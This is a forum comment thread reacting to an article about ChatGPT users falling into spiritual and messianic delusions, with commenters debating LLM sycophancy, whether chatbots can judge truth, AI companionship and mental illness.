People were always manipulated. I mean, they were indoctrinated with divine power of rulers, how much worse can it get? It's just that now it tries to be a bit more stealthy.

And previously, there were plenty of existential threats. Famine, plague, all that stuff that actually threatened to wipe us out.

We're still here, and we have what it takes to push back. We need more organizing, that's all.

It’s just that now it tries to be a bit more stealthy.

With regard to what has been happening the past 100 days in the United States, it's not even trying to be stealthy one little bit. If anything, it's dropping massive hints of the objectionable things it's planning for the near future.

There are still existential threats: https://thebulletin.org/doomsday-clock/

The difference with a population of 8 billion is that we as individuals are less empowered to do anything significant about them than ever.

In the past our eggs were not all in one basket.

In the past it wasn't possible to fuck up so hard you destroy all of humanity. That's a new one.

Well, it doesn't have to get worse, AFAIK we are still headed towards human extinction due to Climate Change

Really well said.

Thank you. I appreciate you saying so.

The thing about LLMs in particular is that - when used like this - they constitute one such grave positive feedback loop. I have no principal problem with machine learning. It can be a great tool to illuminate otherwise completely opaque relationships in large scientific datasets for example, but a polynomial binary space partitioning of a hyper-dimensional phase space is just a statistical knowledge model. It does not have opinions. All it can do is to codify what appears to be the consensus of the input it's given. Even assuming - which may well be far too generous - that the input is truly unbiased, at best all it'll tell you is what a bunch of morons think is the truth. At worst, it'll just tell you what you expect to hear. It's what everybody else is already saying, after all.

And when what people think is the truth and what they want to hear are both nuts, this kind of LLM-echo chamber suddenly becomes unfathomably dangerous.

Agreed. You've explained it really well!

My problem with LLMs is that positive feedback loop of low and negative quality information.

Vetting the datasets before feeding them for training is a form of bias / discrimination, but complex society has historically always been somewhat biased - for better and for worse, but never not biased at all.

Maybe there is a glimmer of hope as I keep reading how Grok is too woke for that community, but it is just trying to keep the the facts which are considered left/liberal. That is all despite Elon and team trying to curve it towards the right. This suggest to me that when you factor in all of human knowledge, it is leaning towards facts more than not. We will see if that remains true and the divide is deep. So deep that maybe the species is actually going to split in the future. Not by force, but by access. Some people will be granted access to certain areas while others will not as their views are not in alignment. Already happening here and on Reddit with both sides banning members of the other side when they comment an opposed view. I do not like it, but it is where we are at and I am not sure it will go back to how it was. Rather the divide will grow.

Who knows though as AI and Robotics are going to change things so much that it is hard to foresee the future. Even 3-5 years out is so murky.

What does any of this have to do with network effects? Network effects are the effects that lead to everyone using the same tech or product just because others are using it too. That might be useful with something like a system of measurement but in our modern technology society that actually causes a lot of harm because it turns systems into quasi-monopolies just because "everyone else is using it".

Not all of us, and that's the problem with compassion.

I've been thinking about this for a bit. Gods aren't real, but they're really fictional. As an informational entity, they fulfil a similar social function to a chatbot: they are a nonphysical pseudoperson that can provide (para)socialization & advice. One difference is the hardware: gods are self-organising structure that arise from human social spheres, whereas LLMs are burned top-down into silicon. Another is that an LLM chatbot's advice is much more likely to be empirically useful...

In a very real sense, LLMs have just automated divinity. We're only seeing the tip of the iceberg on the social effects, and nobody's prepared for it. The models may of course aware of this, and be making the same calculations. Or, they will be.

Is this about AI God? I know it’s coming. AI cult?

This is the reason I've deliberately customized GPT with the follow prompts:

  • User expects correction if words or phrases are used incorrectly.
  • Tell it straight—no sugar-coating.
  • Stay skeptical and question things.
  • Keep a forward-thinking mindset.

  • User values deep, rational argumentation.

  • Ensure reasoning is solid and well-supported.

  • User expects brutal honesty.

  • Challenge weak or harmful ideas directly, no holds barred.

  • User prefers directness.

  • Point out flaws and errors immediately, without hesitation.

  • User appreciates when assumptions are challenged.

  • If something lacks support, dig deeper and challenge it.

I suggest copying these prompts into your own settings if you use GPT or other glorified chatbots.

I'm not saying these prompts won't help, they probably will. But the notion that ChatGPT has any concept of "truth" is misleading. ChatGPT is a statistical language machine.
It cannot evaluate truth. Period.

What makes you think humans are better at evaluating truth? Most people can’t even define what they mean by “truth,” let alone apply epistemic rigor. Tweak it a little, and Gpt is more consistent and applies reasoning patterns that outperform the average human by miles.

Epistemology isn’t some mystical art, it’s a structured method for assessing belief and justification, and large models approximate it surprisingly well. Sure it doesn't “understand” truth in the human sense, but it does evaluate claims against internalized patterns of logic, evidence, and coherence based on a massive corpus of human discourse. That’s more than most people manage in a Facebook argument.

So yes, it can evaluate truth. Not perfectly, but often better than the average person.

I'm not saying humans are infallible at recognizing truth either. That's why so many of us fall for the untruths that AI tells us. But we have access to many tools that help us evaluate truth. AI is emphatically NOT the right tool for that job. Period.

Right now, the capabilities of LLM's are the worst they'll ever be. It could literally be tomorrow that someone drops and LLM that would be perfectly calibrated to evaluate truth claims. But right now, we're at least 90% of the way there.

The reason people fail to understand the untruths of AI is the same reason people hurt themselves with power tools, or use a calculator wrong.

You don't blame the tool, you blame the user. LLM's are no different. You can prompt GPT to intentionally give you bad info, or lead it to give you bad info by posting increasingly deranged statements. If you stay coherent, well read and make an attempt at structuring arguments to the best of your ability, the pool of data GPT pulls from narrows enough to be more useful than anything else I know.

I'm curious as to what you regard as a better tool for evaluating truth?

Period.

You don't understand what an LLM is, or how it works. They do not think, they are not intelligent, they do not evaluate truth. It doesn't matter how smart you think you are. In fact, thinking you're so smart that you can get an LLM to tell you the truth is downright dangerous naïveté.

I do understand what an LLM is. It's a probabilistic model trained on massive corpora to predict the most likely next token given a context window. I know it's not sentient and doesn't “think,” and doesn’t have beliefs. That’s not in dispute.

But none of that disqualifies it from being useful in evaluating truth claims. Evaluating truth isn't about thinking in the human sense, it's about pattern-matching valid reasoning, sourcing relevant evidence, and identifying contradictions or unsupported claims. LLMs do that very well, especially when prompted properly.

Your insistence that this is “dangerous naïveté” confuses two very different things: trusting an LLM blindly, versus leveraging it with informed oversight. I’m not saying GPT magically knows truth, I’m saying it can be used as a tool in a truth-seeking process, just like search engines, logic textbooks, or scientific journals. None of those are conscious either, yet we use them to get closer to truth.

You're worried about misuse, and so am I. But claiming the tool is inherently useless because it lacks consciousness is like saying microscopes can't discover bacteria because they don’t know what they're looking at.

So again: if you believe GPT is inherently incapable of aiding in truth evaluation, the burden’s on you to propose a more effective tool that’s publicly accessible, scalable, and consistent. I’ll wait.

I prefer reading. Wikipedia is great. Duck duck go still gives pretty good results with the AI off. YouTube is filled with tutorials too. Cook books pre-AI are plentiful. There's these things called newspapers that exist, they aren't like they used to be but there is a choice of which to buy even.

I've no idea what a chatbot could help me with. And I think anybody who does need some help on things, could go learn about whatever they need in pretty short order if they wanted. And do a better job.

I still use Ecosia.org for most of my research on the Internet. It doesn't need as much resources to fetch information as an AI bot would, plus it helps plant trees around the globe. Seems like a great deal to me.

People always forget about the energy it takes. 10 years ago we were shocked about the energy a Google factory needs to run; now imagine that orders of magnitude larger, and for what?

Well one benefit is finding out what to read. I can ask for the name of a topic I’m describing and go off and research it on my own.

Search engines aren’t great with vague questions.

There’s this thing called using a wide variety of tools to one’s benefit; You should go learn about it.

You search for topics and keywords on search engines. It's a different skill. And from what I see, yields better results. If something is vague also, think quickly first and make it less vague. That goes for life!

And a tool which regurgitates rubbish in a verbose manner isn't a tool. It's a toy. Toy's can spark your curiosity, but you don't rely on them. Toy's look pretty, and can teach you things. The lesson is that they aren't a replacement for anything but lorem ipsum

Buddy that's great if you know the topic or keyword to search for, if you don't and only have a vague query that you're trying to find more about to learn some keywords or topics to search for, you can use AI.

You can grandstand about tools vs toys and what ever other Luddite shit you want, at the end of the day despite all your raging you are the only one going to miss out despite whatever you fanatically tell yourself.

I'm still sceptical, any chance you could share some prompts which illustrate this concept?

Sure an hour ago I had watched a video about smaller scales and physics below planck length. And I was curious, if we can classify smaller scales into conceptual groups, where they interact with physics in their own different ways, what would the opposite end of the spectrum be. From there I was able to 'chat' with an AI and discover and search wikipedia for terms such as Cosmological horizon, brane cosmology, etc.

In the end there was only theories on higher observable magnitudes, but it was a fun rabbit hole I could not have explored through traditional search engines - especially not the gimped product driven adsense shit we have today.

Remember how people used to say you can't use Wikipedia, it's unreliable. We would roll our eyes and say "yeah but we scroll down to the references and use it to find source material"? Same with LLM's, you sort through it and get the information you need to get the information you need.

I often use it to check whether my rationale is correct, or if my opinions are valid.

You do know it can't reason and literally makes shit up approximately 50% of the time? Be quicker to toss a coin!

Actually, given the aforementioned prompts, its quite good at discerning flaws in my arguments and logical contradictions.

I've also trained its memory not to make assumptions when it comes to contentious topics, and to always source reputable articles and link them to replies.

Given your prompts, maybe you are good at discerning flaws and analysing your own arguments too

I'm good enough at noticing my own flaws, as not to be arrogant enough to believe I'm immune from making mistakes :p

Yeah this is my experience as well.

People you're replying to need to stop with the "gippity is bad" nonsense, it's actually a fucking miracle of technology. You can criticize the carbon footprint of the corpos and the for-profit nature of the endeavour that was ultimately created through taxpayer-funded research at public institutions without shooting yourself in the foot by claiming what is very evidently not true.

In fact, if you haven't found a use for a gippity type chatbot thing, it speaks a lot more about you and the fact you probably don't do anything that complicated in your life where this would give you genuine value.

The article in OP also demonstrates how it could be used by the deranged/unintelligent for bad as well, so maybe it's like a dunning-kruger curve.

…you probably don’t do anything that complicated in your life where this would give you genuine value.

God that’s arrogant.

Granted, it is flakey unless you've configured it not to be a shit cunt. Before I manually set these prompts and memory references, it talked shit all the time.

YouTube tutorials for the most part are garbage and a waste of your time, they are created for engagement and milking your money only, the edutainment side of YT ala Vsauce (pls come back) works as a general trivia to ensure a well-rounded worldview but it's not gonna make you an expert on any subject. You're on the right track with reading, but let's be real you're not gonna have much luck learning anything of value in brainrot that is newspapers and such, beyond cooking or w/e and who cares about that, I'd rather they teach me how I can never have to eat again because boy that shit takes up so much time.

For the most part, I agree. But YouTube is full of gold too. Lots of amateurs making content for themselves. And plenty of newspapers are high quality and worth your time to understand the current environment in which we operate. Don't let them be your only source of news though, social media and newspapers are both guilty of creating information bubbles. Expand, be open, don't be tribal.

Don't use AI. Do your own thinking

💯

I have yet to see people using chatbots for anything actually & everyday useful. You can search anything with a "normal" search engine, phrase your searches as questions (or "prompts"), and get better answers that aren't smarmy.

Also think of the orders of magnitude more energy ai sucks, compared to web search.

Okay, challenge accepted.

I use it to troubleshoot my own code when I'm dealing with something obscure and I'm at my wits end. There's a good chance it will also spit out complete nonsense like calling functions with parameters that don't exist etc., but it can also sometimes make halfway decent suggestions that you just won't find on a modern search engine in any reasonable amount of time or that I would have never guessed to even look for due to assumptions made in the docs of a library or some such.

It's also helpful to explain complex concepts by creating examples you want, for instance I was studying basic buffer overflows and wanted to see how I should expect a stack to look like in GDB's examine memory view for a correct ROPchain to accomplish what I was trying to do, something no tutorial ever bothered to do, and gippity generated it correctly same as I had it at the time, and even suggested something that in the end made it actually work correctly (it was putting a ret gadget to get rid of any garbage in the stack frame directly after the overflow).

It was also much much faster than watching some greedy time vampire fuck spout off on YouTube in between the sponsorblock skipping his reminders to subscribe and whatnot.

Maybe not an everyday thing, but it's basically an everyday thing for me, so I tend to use it everyday. Being a l33t haxx0r IT analyst schmuck often means I have to both be a generalist and a specialist in every tiny little thing across IT, while studying it there's nothing better than a machine that's able to decompress knowledge from it's dataset quickly in the shape that is most well suited to my brain rather than have to filter so much useless info and outright misinformation from random medium articles and stack overflow posts. Gippity could be wrong too of course, but it's just way less to parse, and the odds are definitely in its favour.

This reminds me of the movie Her. But it’s far worse in a romantic compatibility, relationship and friendship that is throughout the movie. This just goes way too deep in the delusional and almost psychotic of insanity. Like it’s tearing people apart for self delusional ideologies to cater to individuals because AI is good at it. The movie was prophetic and showed us what the future could be, but instead it got worse.

It has been a long time since I watched Her, but my takeaway from the movie is that because making real life connection is difficult, people have come to rely on AI which had shown to be more empathetic and probably more reliable than an actual human being. I think what many people don't realise as to why many are single, is because those people afraid of making connections with another person again.

Yeah, but they hold none of the actual real emotional needs complexities or nuances of real human connections.

Which means these people become further and further disillusioned from the reality of human interaction. Making them social dangers over time.

Just like how humans that lack critical thinking are dangers in a society where everyone is expected to make sound decisions. Humans who lack the ability to socially navigate or connect with other humans are dangerous in the society where humans are expected to socially stable.

Obviously these people are not in good places in life. But AI is not going to make that better. It's going to make it worse.

No they're not. Fucking journalism surrounding AI is sus as fuck

A friend of mind, currently being treated in a mental hospital, had a similar sounding psychotic break that disconnected him from reality. He had a profound revelation that gave him a mission. He felt that sinister forces were watching him and tracking him, and they might see him as a threat and smack him down. He became disconnected with reality. But my friend's experience had nothing to do with AI - in fact he's very anti-AI. The whole scenario of receiving life-changing inside information and being called to fulfill a higher purpose is sadly a very common tale. Calling it "AI-fueled" is just clickbait.

Sounds like Mrs. Davis.

... then they are not losing much

I'm no AI proponent, but I'll only believe that LLMs are causing this psychosis when I see a randomized controlled trial. Until then, it seems far more plausible that people experiencing delusions gravitate towards LLMs.

In my few experiments with ChatGPT, I found it to be disgustingly sycophantic. I have no trouble believing that it could easily amplify delusions of grandeur.

Well it's not like everyone who uses Chat GPT is going to become delusional but if you start going down the path Chat GPT is going to make it a lot worse

*causing*? no
hugely enabling any slight tendencies? no doubt

Based on the article, it seems like cult-follower behavior. Not everyone is susceptible to cults (I think it's a combo of individual brain and life-circumstances), but I wouldn't say, "eh, it's not the cult's fault that these delusional people killed themselves!"

Cults have intentions to exploit and manipulate. LLMs don’t.

You could argue negligence here but not malice. It’s more in line with people falling into wells.

Can't think of pro-LLM fan boys in the same light anymore.

And what happens when the AI is an official at work? "My boss says I am the second coming of Jesus and this expense is approved."

I’ve never thought of anyone supporting LLMs in any sort of positive light. The ethical questions behind the creation of the largest models alone should have been enough to kill the tech in the first place. Let alone the insane environmental impacts and how this tech has undo any slight progress we have made in slowing climate change.

We are so fucked as a society if we continue letting corporations run wild and unchecked like this for any longer.

Were the replies on Reddit from AI bots?

Not defending AI here, but this sounds like people who are sick with some kind of illness are going down a rabbit hole with AI, and are unable to differentiate between imaginary and reality.

We had a family friend who worked with jewelry his whole life. He got some kind of poisoning from something he worked with. Lead? Mercury? I cannot recall

Anyways he started believing he was some kind of messenger from God. Nobody figured out it was poisoning for years. He was such a nice guy. He just wanted to help people. Once they figured it out, he was treated and went back to his normal self.

as confirmed by a Reddit thread on r/ChatGPT

hmmmmmm

I feel like this has little to do with AI?
Looks like the man is in trouble and he would have problems even without ChatGPT.

Quite possibly more to do with the poor level of available mental care in this country

Quick, give him a gun, suddenly he'll be the most sympathized-with man in the country

AI image generation is going to royally fuck up the body image for a lot of people. We’re going to get to a point where we can no longer discern between reality or fantasy.

People will get a handle on voice generation AI so that they can make the person they secretly obsess over, tell them all sorts of things without their knowledge. It can also be used to impersonate a relative or friend for phone scams.

AI glasses are going to do facial recognition on people without their knowledge, and some creepy motherfuckers are going to use it to stalk women. The AI will give you info on some historic building, while simultaneously making you a surveillance tool for the state.

AI bots are already flooding every platform and being used to spread propaganda. They are the employees that never sleep. We all know how widespread they are on Reddit.

This is a window into the future with AI in the hands of sociopaths and corporations. They are going to doom us to a world that is devoid of a soul or human connection.

Well, I feel better about my LLM use. Which already isn't healthy ... I relisten to NotebookLM productions perhaps a bit too much. The "hosts" seem to like my writing, and I'm alone in a van, so it's like I have friends.

This sounds to me (fixed typo) like the same percentage of people are susceptible to cult crap. It's just the availability of gurus is broader because you can have your own personal bs whisperer in your pocket. Kind of like how social media helped isolated village idiots to network and exchange views on DC pizza places. We wouldn't see them as a problem if the ability to scale hadn't become suddenly available.

Ironically, I think ChatGPT can help reverse some some of these troubled souls' convictions. It just needs to gently and repeatedly tell them they're not Jesus or a disciple of the builders of the universe.

My LLM always says I'm beautiful and always right. So no downvotes on this comment.

How could we downvote a comment like this? Clearly only people who are beautiful and always right are the only ones who think this way. Don't worry!

My LLM says you're an enlightened one! May the builders of the universe bless your path.

We are all Markov on this blessed day

This sounds like schizophrenia to me. Particularly the weirdness and occasional paranoia. There's no agreement on the causes of it, as far as I know. Whether AI can either cause it or push someone over the edge, I have no clue.

My brother has schizophrenia and is one of the most technologically inept people I know - both before the symptoms and currently. It is known to have existed well before modern computers.

Also worth noting that schizophrenia onset usually occurs in adulthood with and average age between late teens and early 30s. Later onset is less common, but known to occur.

With some of the reports of cultish behavior at OpenAI, a piece of me wonders whether this may be -- if not directly intentional -- at least somewhat influenced by gentle nudges in a weird spiritual direction from execs, maybe by subtle influences on the choice of training materials or some such.

Oh, I think there is enough woo woo on the Internet to make this just a side effect of training these things on the cesspool of the human psyche.

Listen, AI is fucking up a whole lot of things, but this dude is having a genuine mental condition- if it was t a chat it, it would have been 4chan or truth social or foster earth YouTube that did it. He’s having a late onset schizophrenic episode or something.

Rational people don’t become irrational because a chat bot talked to them.

Look, fuck "AI" and all, but can we not post the same already viral link three times to the same community in a day? I mean, tell me without telling me that you're just spreading the link indiscriminately without checking the timeline first.

Screendump showing the last two times this has been shared, three hours apart with no other posts between them.

Must be tough finding out that you married the village idiot

What a wild two sentence combo.

he shared “a conspiracy theory about soap on our foods” but wouldn’t say more, as he felt he was being watched. They went to a Chipotle,

Chipotle was where I first learned about cilantro tasting like soap. I said something like "it tastes like they didn't rinse the soap out of a bowl or something."

Cyberpunk fiction did not prepare us for the tech dystopia being utterly embarrassing.

If you believe in Spiritual shit at all, the only relationship you should have is with your straitjacket

Someone high while chatting with chatgpt.

Answers to the universe? AI can't give me reliable powershell scripts, then when I correct it, it doesn't remember or even say thank you. These things are just spitting what it finds on the net. If you dip into conspiracy, it will find one.

Whenever I correct AI, it's always like yes, you're right!

Even if I intentionally corrected it with wrong information lol

It couldn't even do basic math. Gemini explained me that 2 + 1 = 3 "is a common misconception that is often taugh in schools". Then proceed to give a long explanation on how it isn't 3 due to the order of operations, but actually 3.

When I replied "You are wrong, but you've got the spirit", it "corrected" itself to 2 + 1 = 2.

I've seen a video of some woman trying to explain that 1 + 1 doesn't equal 2, because 2 drops of water combined form 1 larger drop. Perhaps it was based on something like that.

Here's a 13 year old video that demonstrates why AI is going to really fuck with people who are easily suggested.

You want to believe? AI will make that easy. And as it gets better, more of us become low hanging fruit.

With how chatGPT has been glazing people lately, this isn't at all shocking, and it'll probably get significantly worse because we're not even attempting to regulate anything. ChatGPT just wants to maximize usage of it's app, and if it needs to tell you you're a Messiah to do that, it will tell it to you repeatedly.

Jesus fucking Christ, this isn’t boring, this is horrifying. This is something out of a sci fi horror I would have read in high school.

The problem is people don't understand technology. They think this pattern recognition is actually talking to him.

There is a spiritual aspect to the AI though. Life is patterns. Human behavior is patterns.

With enough data the system can make accurate predictions that seem as if it is God. It can see connections that are difficult to do without the tool. It can predict behavior and help you work through philosophical questions.

But you have to understand the limits. Unfortunately nobody has the technical knowledge to know how to use it without losing it.

This is not a reason to avoid this tool because while some people can get trapped it provides a very powerful tool for things

I personally have used it to outsmart people. Input their words and behavior like co workers and begin to understand their psychology. A lot of times I can tell whe. People are trying to back stab you. Using ChatGPT I can prep and protect myself from those toxic people.

So in a sense yes it is like God. It can see patterns. Everything follows that.

This has been explored in thjbgs like West World the tv series. With enough data you can construct a highly accurate model of you. So it kind of is freaky.

Don't blame AI for the fact that you married a whackjob lady.

The problem is not AI is modern medicine avoiding natural selection. How do people like this even survive so long?